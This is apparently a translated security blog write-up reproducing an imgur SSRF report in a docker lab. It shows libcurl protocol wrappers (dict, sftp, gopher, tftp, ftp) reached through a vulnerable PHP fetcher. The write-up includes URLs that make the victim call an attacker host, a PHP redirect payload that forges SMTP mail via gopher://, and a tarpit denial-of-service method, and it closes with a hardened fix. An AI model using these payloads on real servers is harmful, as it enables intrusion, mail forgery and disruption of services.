SSRF: Exploitation Analysis of libcurl Protocol Wrappers
0x00 Overview
A few days ago I saw an imgur SSRF vulnerability on HackerOne, at the URL https://imgur.com/vidgif/url?url=xxx. The url parameter is not restricted, so intranet addresses can be reached. When libcurl is used to make the request and is not configured properly, an attacker can use libcurl protocols (wrappers) other than http(s), such as ftp://xxx.com/file, to make the server initiate an FTP request.
The reporter, aesteral, gave several ways of using these protocols in the report. The earlier SSRF article on drops does not specifically cover protocol wrappers, so after seeing this report we built an environment to reproduce it and recorded the process.
0x01 environment setup
First, we need to build a php + nginx environment to simulate the SSRF-vulnerable server. Here we use docker; the host system is Ubuntu 14.04. For installing docker, refer to the documentation; we recommend switching Ubuntu's apt source to a mirror in China so the installation is faster.
After installation, pull an image with the php + nginx environment already set up from Docker Hub. The repository is hosted abroad, so it may be a little slow.
docker pull Richard/nginx-php-fpm
Create the code directory /app
Start the container (mapping the port and mounting the volume):
sudo docker run --name nginx -p 8084:80 -v /app:/usr/share/nginx/html -d Richard/nginx-php-fpm
Create ssrf.php in the /app directory. The script uses curl to request the resource given in the url parameter and returns it to the client, which simulates the SSRF functionality.
First test that it loads and returns an image.
http://victim:8084/ssrf.php?url=http://download.easyicon.net/png/1199986/96/
To test the SSRF, run nc -l -v 11111 on another machine to listen on port 11111
Access http://victim:8084/ssrf.php?url=http://attacker:11111/
0x02 available protocols
The available protocols provided in the report are:
SSH (scp://, sftp://), POP3, IMAP, SMTP, FTP, DICT, GOPHER, TFTP
Let's look at the protocols supported by the default libcurl on Ubuntu 14.04.
The docker Ubuntu image does not include curl, so install it with apt-get install -y curl
Then run curl -V
[email protected]:/app# curl -V
curl 7.35.0 (x86_64-pc-linux-gnu) libcurl/7.35.0 OpenSSL/1.0.1f zlib/1.2.8 libidn/1.28 librtmp/2.3
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp smtp smtps telnet tftp
Features: AsynchDNS GSS-Negotiate IDN IPv6 Largefile NTLM NTLM_WB SSL libz TLS-SRP
We can see that the protocol list
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp smtp smtps telnet tftp
does not include SSH (scp://, sftp://), so the default build does not support the SSH protocols. To reproduce those you need to download the source and compile and install it yourself; you can refer to this article.
0x03 usage
Simple exploitation and Information Leakage
Obtaining software version information using the SSH and DICT protocols
sftp (requires compiling and installing curl with the libssh2 library): access http://victim:8084/ssrf.php?url=sftp://attacker:11111/
DICT: access http://victim:8084/ssrf.php?url=dict://attacker:11111/
The banners reveal the software versions used by the service: libssh2 1.4.3 and libcurl 7.35.0. Checking the CVEs:
Libssh2 1.4.3 may be affected by CVE-2015-1782
In the report, the imgur server ran libcurl 7.40.0, which may be affected by CVE-2015-3144 and CVE-2015-3237. Our version, libcurl 7.35.0, is not affected.
Using the GOPHER protocol to forge emails
First, an introduction to the GOPHER protocol, from Baidu ~
Gopher is a protocol for retrieving data from remote servers that predates the web. It is rarely used today and has been almost entirely replaced by HTTP.
Because a gopher:// URL can carry newlines, it can be used to drive TELNET-like chat sessions such as SMTP and the Redis protocol. As the vulnerability report notes, imgur filters newlines in the url parameter; however, the imgur server follows 302 redirects, so a 302 redirect page can be constructed to deliver the GOPHER-based attack.
First, test the effect of the GOPHER protocol by constructing the 302 redirect page gopher.php
Access http://victim:8084/ssrf.php?url=http://attacker/gopher.php
Attacker:
Next, I tried sending an email. I wanted to try it with my domestic mailbox, but it has login verification added to prevent spam.
The report gives http://test.smtp.org/, a site that can be used for testing; the recipient has to be changed accordingly, otherwise the mail will not be sent.
smtp.php:
<?php
$commands = array(
    // ... the earlier entries of the array are truncated in the original ...
    'RCPT TO: [email protected]',
    'DATA',
    'Test mail',
    '.'
);
// Join the commands with encoded newlines and redirect the fetching server to gopher://
$payload = implode('%0A', $commands);
header('Location: gopher://smtp.163.com:25/_'.$payload);
?>
Access http://victim:8084/ssrf.php?url=http://attacker:8084/smtp.php
The log can be viewed at http://test.smtp.org/log. My VPS could not connect to port 25 of test.smtp.org, so I simulated the exchange directly with TELNET instead
[email protected]:~$ telnet test.smtp.org 25
Trying 52.2.168.164...
Connected to test.smtp.org.
Escape character is '^]'.
220 test.smtp.org ESMTP Sendmail 8.16.0.16 ready at Fri, 18 Mar 2016 06:47:04 GMT; see http://test.smtp.org/
HELO test.org
250 test.smtp.org Hello [xx.xx.xx.xx], pleased to meet you
MAIL FROM: <[email protected]>
250 2.1.0 <[email protected]>... Sender ok
RCPT TO: [email protected]
250 2.1.5 [email protected].. Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
Test mail
.
250 2.0.0 u2I6l4QU017644 Message accepted for delivery
Logs
Using the TFTP protocol to send UDP packets
The attacker listens on UDP port 11111: nc -v -u -l 11111
Access http://victim:8084/ssrf.php?url=tftp://attacker:11111/TEST
Attacker:
This can be used to send requests to UDP services such as Memcache and Redis over UDP.
Denial of service
If the request timeout is long, an attacker can hang the request with the iptables TARPIT target. Moreover, curl's ftp:// never times out.
The attacker listens with nc -v -l 11111
Access http://victim:8084/ssrf.php?url=ftp://attacker:11111/TEST
In the nginx environment, the default timeout is 1 minute.
An attacker can issue a large number of such requests to exhaust server resources.
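The post does not show ssrf.php, so the following is an added example (not the original script) that reconstructs it from the description in the environment setup and places it beside a hardened version. The hardened form closes the three issues covered above: non-http(s) wrappers, the 302-to-gopher:// redirect, and the never-ending ftp:// request. The host names and port are the post's; the option values are choices for this example.

```php
<?php
// Added example: reconstruction of the post's ssrf.php (vulnerable) next to a
// hardened version. Not the original code from the post.

function fetch_vulnerable($url) {
    // The scheme is passed to libcurl unchanged, so dict://, gopher://, tftp://,
    // ftp:// and anything else the build supports is reachable from here.
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // a 302 to gopher:// is followed as well
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

function fetch_hardened($url) {
    // 1. Accept only http/https at the application layer.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, array('http', 'https'), true)) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // 2. Restrict the schemes libcurl itself may speak, both for the initial
    //    request and for any redirect it follows. CURLOPT_REDIR_PROTOCOLS is what
    //    stops the 302 -> gopher://smtp... trick described in the GOPHER section.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_MAXREDIRS, 3);
    // 3. Bound the request so a tarpitted peer or a hanging ftp:// connection
    //    cannot hold a php-fpm worker for the full nginx timeout (values are
    //    example choices).
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// Entry point for http://victim:8084/ssrf.php?url=...
if (isset($_GET['url'])) {
    $body = fetch_hardened($_GET['url']);
    if ($body === false) {
        http_response_code(400);
        exit('only http(s) URLs are allowed');
    }
    echo $body;
}
```

The hardened version addresses only the protocol wrappers discussed in this post; restricting which hosts may be fetched (for example intranet address ranges) is a separate check that it does not perform.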
0x04 conclusion
When a site has an SSRF vulnerability, protocols other than http(s) can also be used. Here we have made a simple analysis and hope it helps ~